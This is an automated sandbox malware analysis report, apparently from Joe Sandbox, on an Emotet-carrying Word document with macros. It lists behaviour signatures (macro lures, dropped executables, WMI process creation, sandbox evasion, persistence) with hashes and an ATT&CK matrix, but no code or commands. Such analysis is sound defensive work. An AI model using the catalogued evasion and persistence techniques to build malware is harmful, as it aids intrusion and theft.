Play interactive tour
Edit tourAnalysis Report sample1.bin
Overview
General Information
| Sample Name: | sample1.bin (renamed file extension from bin to doc) |
| Analysis ID: | 339446 |
| MD5: | 7dbd8ecfada1d39a81a58c9468b91039 |
| SHA1: | 0d21e2742204d1f98f6fcabe0544570fd6857dd3 |
| SHA256: | dc40e48d2eb0e57cd16b1792bdccc185440f632783c7bcc87c955e1d4e88fc95 |
Most interesting Screenshot:  | |
Detection
Emotet
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Creates and opens a fake document (probably a fake document to hide exploiting)
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to delete services
Contains functionality to enumerate running services
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
Startup |
|---|
|
Malware Configuration |
|---|
| No configs have been found |
|---|
Yara Overview |
|---|
Memory Dumps |
|---|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Emotet | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet | Yara detected Emotet | Joe Security | ||
| Click to see the 23 entries | ||||
Unpacked PEs |
|---|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Emotet | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet | Yara detected Emotet | Joe Security | ||
| Click to see the 4 entries | ||||
Sigma Overview |
|---|
| No Sigma rule has matched |
|---|
Signature Overview |
|---|
Click to jump to signature section
Show All Signature Results
AV Detection: |   |
|---|
| Antivirus / Scanner detection for submitted sample | Show sources | ||
| Source: | Avira: | ||
| Antivirus detection for dropped file | Show sources | ||
| Source: | Avira: | ||
| Multi AV Scanner detection for dropped file | Show sources | ||
| Source: | Metadefender: | Perma Link | ||
| Source: | ReversingLabs: | |||
| Multi AV Scanner detection for submitted file | Show sources | ||
| Source: | Virustotal: | Perma Link | ||
| Source: | Metadefender: | Perma Link | ||
| Source: | ReversingLabs: | |||
| Machine Learning detection for dropped file | Show sources | ||
| Source: | Joe Sandbox ML: | ||
| Machine Learning detection for sample | Show sources | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Code function: | 15_2_004825E0 | |
| Source: | Code function: | 15_2_00482230 | |
| Source: | Code function: | 15_2_00481FC0 | |
| Source: | Code function: | 15_2_00481FD8 | |
| Source: | File opened: | Jump to behavior | ||
| Source: | Code function: | 7_2_003F38F0 | |
| Source: | Code function: | 8_2_003638F0 | |
| Source: | Code function: | 9_2_003B38F0 | |
| Source: | Code function: | 10_2_007B38F0 | |
| Source: | Code function: | 11_2_002B38F0 | |
| Source: | Code function: | 12_2_003E38F0 | |
| Source: | Code function: | 13_2_003238F0 | |
| Source: | Code function: | 14_2_006238F0 | |
| Source: | Code function: | 15_2_004838F0 | |
| Source: | Code function: | 7_2_0041FA20 | |
| Source: | TCP traffic: | ||
Networking: | |
|---|
| Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) | Show sources | ||
| Source: | Snort IDS: | ||
| Source: | IP Address: | ||
| Source: | ASN Name: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | File created: | Jump to behavior | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
E-Banking Fraud: | |
|---|
| Yara detected Emotet | Show sources | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | Code function: | 15_2_004825E0 | |
System Summary: | |
|---|
| Malicious sample detected (through community Yara rule) | Show sources | ||
| Source: | Matched rule: | ||
| Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources | ||
| Source: | Screenshot OCR: | ||
| Source: | Screenshot OCR: | ||
| Source: | Screenshot OCR: | ||
| Source: | Screenshot OCR: | ||
| Document contains an embedded VBA macro with suspicious strings | Show sources | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Code function: | 7_2_003E0400 | |
| Source: | Code function: | 8_2_002D0400 | |
| Source: | Code function: | 9_2_003A0400 | |
| Source: | Code function: | 10_2_007A0400 | |
| Source: | Code function: | 11_2_002A0400 | |
| Source: | Code function: | 12_2_002D0400 | |
| Source: | Code function: | 13_2_00310400 | |
| Source: | Code function: | 14_2_00610400 | |
| Source: | Code function: | 15_2_00460400 | |
| Source: | Code function: | 8_2_00368E80 | |
| Source: | File created: | Jump to behavior | ||
| Source: | File deleted: | Jump to behavior | ||
| Source: | Code function: | 7_2_0040314D | |
| Source: | Code function: | 7_2_004052D4 | |
| Source: | Code function: | 7_2_00409350 | |
| Source: | Code function: | 7_2_00406DA8 | |
| Source: | Code function: | 7_2_003F78B0 | |
| Source: | Code function: | 7_2_003F1C70 | |
| Source: | Code function: | 7_2_003F65E0 | |
| Source: | Code function: | 8_2_00361C70 | |
| Source: | Code function: | 8_2_003678B0 | |
| Source: | Code function: | 8_2_003665E0 | |
| Source: | Code function: | 9_2_003B1C70 | |
| Source: | Code function: | 9_2_003B78B0 | |
| Source: | Code function: | 9_2_003B65E0 | |
| Source: | Code function: | 10_2_007B1C70 | |
| Source: | Code function: | 10_2_007B65E0 | |
| Source: | Code function: | 10_2_007B78B0 | |
| Source: | Code function: | 11_2_002B1C70 | |
| Source: | Code function: | 11_2_002B78B0 | |
| Source: | Code function: | 11_2_002B65E0 | |
| Source: | Code function: | 12_2_003E1C70 | |
| Source: | Code function: | 12_2_003E78B0 | |
| Source: | Code function: | 12_2_003E65E0 | |
| Source: | Code function: | 13_2_00321C70 | |
| Source: | Code function: | 13_2_003278B0 | |
| Source: | Code function: | 13_2_003265E0 | |
| Source: | Code function: | 14_2_00621C70 | |
| Source: | Code function: | 14_2_006265E0 | |
| Source: | Code function: | 14_2_006278B0 | |
| Source: | Code function: | 15_2_00481C70 | |
| Source: | Code function: | 15_2_004865E0 | |
| Source: | Code function: | 15_2_004878B0 | |
| Source: | OLE, VBA macro line: | |||
| Source: | OLE, VBA macro line: | |||
| Source: | OLE, VBA macro line: | |||
| Source: | OLE, VBA macro: | Name: Document_Close | ||
| Source: | OLE, VBA macro: | Name: Form_Close | ||
| Source: | OLE indicator, VBA macros: | ||
| Source: | Dropped File: | ||
| Source: | Matched rule: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Classification label: | ||
| Source: | Code function: | 7_2_003F8970 | |
| Source: | Code function: | 8_2_00368970 | |
| Source: | Code function: | 9_2_003B8970 | |
| Source: | Code function: | 10_2_007B8970 | |
| Source: | Code function: | 11_2_002B8970 | |
| Source: | Code function: | 12_2_003E8970 | |
| Source: | Code function: | 13_2_00328970 | |
| Source: | Code function: | 14_2_00628970 | |
| Source: | Code function: | 15_2_00484C80 | |
| Source: | Code function: | 7_2_003F5040 | |
| Source: | File created: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | OLE indicator, Word Document stream: | ||
| Source: | OLE document summary: | ||
| Source: | Console Write: | Jump to behavior | ||
| Source: | Console Write: | Jump to behavior | ||
| Source: | Console Write: | Jump to behavior | ||
| Source: | Console Write: | Jump to behavior | ||
| Source: | Console Write: | Jump to behavior | ||
| Source: | Console Write: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | WMI Queries: | ||
| Source: | WMI Queries: | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | File read: | Jump to behavior | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Virustotal: | ||
| Source: | Metadefender: | ||
| Source: | ReversingLabs: | ||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Key value queried: | Jump to behavior | ||
| Source: | Window detected: | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Code function: | 7_2_004047EF | |
| Source: | Code function: | 7_2_00404037 | |
| Source: | Code function: | 7_2_00408893 | |
| Source: | Code function: | 7_2_0040611B | |
| Source: | Code function: | 7_2_0040A12F | |
| Source: | Code function: | 7_2_00403233 | |
| Source: | Code function: | 7_2_00407223 | |
| Source: | Code function: | 7_2_00403233 | |
| Source: | Code function: | 7_2_00403287 | |
| Source: | Code function: | 7_2_00405B3F | |
| Source: | Code function: | 7_2_004062F7 | |
| Source: | Code function: | 7_2_0040AB17 | |
| Source: | Code function: | 7_2_00403B4F | |
| Source: | Code function: | 7_2_00404B03 | |
| Source: | Code function: | 7_2_00403B47 | |
| Source: | Code function: | 7_2_004053E7 | |
| Source: | Code function: | 7_2_0040847B | |
| Source: | Code function: | 7_2_00407C78 | |
| Source: | Code function: | 7_2_0040A497 | |
| Source: | Code function: | 7_2_004074CF | |
| Source: | Code function: | 7_2_004044F3 | |
| Source: | Code function: | 7_2_004054B7 | |
| Source: | Code function: | 7_2_00404523 | |
| Source: | Code function: | 7_2_00404523 | |
| Source: | Code function: | 7_2_00406FAF | |
| Source: | Code function: | 7_2_0040A647 | |
| Source: | Code function: | 7_2_00403E54 | |
| Source: | Code function: | 7_2_0040565F | |
| Source: | Code function: | 7_2_00407E7F | |
| Source: | Code function: | 7_2_00409E0B | |
| Source: | Code function: | 7_2_0040869B | |
Persistence and Installation Behavior: | |
|---|
| Creates processes via WMI | Show sources | ||
| Source: | WMI Queries: | ||
| Source: | WMI Queries: | ||
| Drops executables to the windows directory (C:\Windows) and starts them | Show sources | ||
| Source: | Executable created and started: | Jump to behavior | ||
| Source: | Executable created and started: | Jump to behavior | ||
| Source: | Executable created and started: | Jump to behavior | ||
| Source: | Executable created and started: | Jump to behavior | ||
| Source: | Executable created and started: | Jump to behavior | ||
| Source: | Executable created and started: | Jump to behavior | ||
| Source: | Executable created and started: | Jump to behavior | ||
| Source: | Executable created and started: | Jump to behavior | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
Boot Survival: | |
|---|
| Drops PE files to the user root directory | Show sources | ||
| Source: | File created: | Jump to dropped file | ||
Hooking and other Techniques for Hiding and Protection: | |
|---|
| Creates and opens a fake document (probably a fake document to hide exploiting) | Show sources | ||
| Source: | Process created: | ||
| Hides that the sample has been downloaded from the Internet (zone.identifier) | Show sources | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Stream path 'Data' entropy: | ||
Malware Analysis System Evasion: | |
|---|
| Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) | Show sources | ||
| Source: | Evasive API call chain: | graph_8-6262 | ||
| Source: | Evasive API call chain: | graph_7-10197 | ||
| Source: | Evasive API call chain: | graph_9-6366 | ||
| Source: | Evasive API call chain: | graph_13-6366 | ||
| Source: | Evasive API call chain: | graph_10-6092 | ||
| Source: | Evasive API call chain: | graph_11-6345 | ||
| Source: | Evasive API call chain: | |||
| Source: | Evasive API call chain: | graph_12-6327 | ||
| Source: | Code function: | 7_2_003F5040 | |
| Source: | Code function: | 8_2_00365040 | |
| Source: | Code function: | 9_2_003B5040 | |
| Source: | Code function: | 10_2_007B5040 | |
| Source: | Code function: | 11_2_002B5040 | |
| Source: | Code function: | 12_2_003E5040 | |
| Source: | Code function: | 13_2_00325040 | |
| Source: | Code function: | 14_2_00625040 | |
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | Code function: | 7_2_003F38F0 | |
| Source: | Code function: | 8_2_003638F0 | |
| Source: | Code function: | 9_2_003B38F0 | |
| Source: | Code function: | 10_2_007B38F0 | |
| Source: | Code function: | 11_2_002B38F0 | |
| Source: | Code function: | 12_2_003E38F0 | |
| Source: | Code function: | 13_2_003238F0 | |
| Source: | Code function: | 14_2_006238F0 | |
| Source: | Code function: | 15_2_004838F0 | |
| Source: | Binary or memory string: | ||
| Source: | Process information queried: | Jump to behavior | ||
| Source: | Code function: | 7_2_003F4DF0 | |
| Source: | Code function: | 7_2_003F3F00 | |
| Source: | Code function: | 8_2_00363F00 | |
| Source: | Code function: | 8_2_00364DF0 | |
| Source: | Code function: | 9_2_003B3F00 | |
| Source: | Code function: | 9_2_003B4DF0 | |
| Source: | Code function: | 10_2_007B3F00 | |
| Source: | Code function: | 10_2_007B4DF0 | |
| Source: | Code function: | 11_2_002B3F00 | |
| Source: | Code function: | 11_2_002B4DF0 | |
| Source: | Code function: | 12_2_003E3F00 | |
| Source: | Code function: | 12_2_003E4DF0 | |
| Source: | Code function: | 13_2_00323F00 | |
| Source: | Code function: | 13_2_00324DF0 | |
| Source: | Code function: | 14_2_00623F00 | |
| Source: | Code function: | 14_2_00624DF0 | |
| Source: | Code function: | 15_2_00483F00 | |
| Source: | Code function: | 15_2_00484DF0 | |
| Source: | Code function: | 7_2_003F9860 | |
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Code function: | 7_2_003F80A0 | |
| Source: | Code function: | 15_2_004853D0 | |
| Source: | Key value queried: | Jump to behavior | ||
Stealing of Sensitive Information: | |
|---|
| Yara detected Emotet | Show sources | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
Mitre Att&ck Matrix |
|---|
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | Windows Management Instrumentation11 | Windows Service12 | Windows Service12 | Disable or Modify Tools1 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact1 |
